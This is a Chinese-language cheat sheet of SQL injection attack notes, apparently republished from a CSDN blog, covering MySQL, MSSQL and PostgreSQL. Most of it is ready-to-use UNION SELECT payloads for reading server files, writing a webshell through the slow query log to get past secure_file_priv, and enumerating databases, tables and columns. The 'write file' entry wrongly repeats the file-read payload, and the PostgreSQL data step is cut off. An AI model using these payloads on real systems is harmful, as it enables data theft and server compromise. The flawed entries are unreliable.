欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 高考 > 网络安全之攻防笔记--通用漏洞SQL注入之MySQLmssqlpostgresql

网络安全之攻防笔记--通用漏洞SQL注入之MySQLmssqlpostgresql

2025/2/24 12:17:34 来源:https://blog.csdn.net/Dawndddddd/article/details/145689690  浏览:    关键词:网络安全之攻防笔记--通用漏洞SQL注入之MySQLmssqlpostgresql
  • 通用漏洞SQL注入之mysql&h&mssql&postgresql
    • mysql数据库
      • root高权限读写注入
        • 读取文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 写入文件
          • UNION SELECT 1,load_file('d:/w.txt'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
        • 路径获取
          • phpinfo,报错,字典等
        • 无法写入
          • secure_file_priv 突破 注入中需要支持 SQL 执行环境,没有就需要借助 phpmyadmin 或能够直接连上对方数据库进行绕过
          • set global slow_query_log=1
          • set global slow_query_log_file='shell 路径';
          • select '' or SLEEP(1);
    • mssql数据库
      • 高权限读写注入
        • 可以执行系统命令、读写文件操作
        • 测列数
          • ORDER BY 4
          • AND 1=2 UNION SELECT NULL,NULL,NULL,NULL
        • 测显位
          • AND 1=2 UNION SELECT NULL,'NULL',NULL,NULL
        • 获取信息
          • AND 1=2 UNION SELECT NULL,@@VERSION,NULL,NULL
          • AND 1=2 UNION SELECT NULL,SUSER_NAME(),NULL,NULL
          • AND 1=2 UNION SELECT NULL,DB_NAME(),NULL,NULL
        • 获取数据库名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM master..sysdatabases
        • 获取表名
          • AND 1=2 UNION SELECT NULL,name,NULL,NULL FROM sysobjects WHERE xtype='U'
        • 获取数据
          • AND 1=2 UNION SELECT NULL,column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'
    • postgresql数据库
      • 高权限读写注入
        • 测列数
          • order by 4
          • and 1=2 union select null,null,null,null
        • 测显位:第2,3
          • and 1=2 union select 'null',null,null,null 错误
          • and 1=2 union select null,'null',null,null 正常
          • and 1=2 union select null,null,'null',null 正常
          • and 1=2 union select null,null,null,'null' 错误
        • 获取信息
          • and 1=2 UNION SELECT null,version(),null,null
          • and 1=2 UNION SELECT null,current_user,null,null
          • and 1=2 union select null,current_database(),null,null
        • 获取数据库名:
          • and 1=2 union select null,string_agg(datname,','),null,null from pg_database
        • 获取表名
          • 1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
          • 2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
        • 获取数据
          • and 1=2 union select
    • 另外
      • access无高权限注入点--只能猜解,还是暴力猜解
      • MySQL,postgresql,mssql高权限注入点-可升级读写执行

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com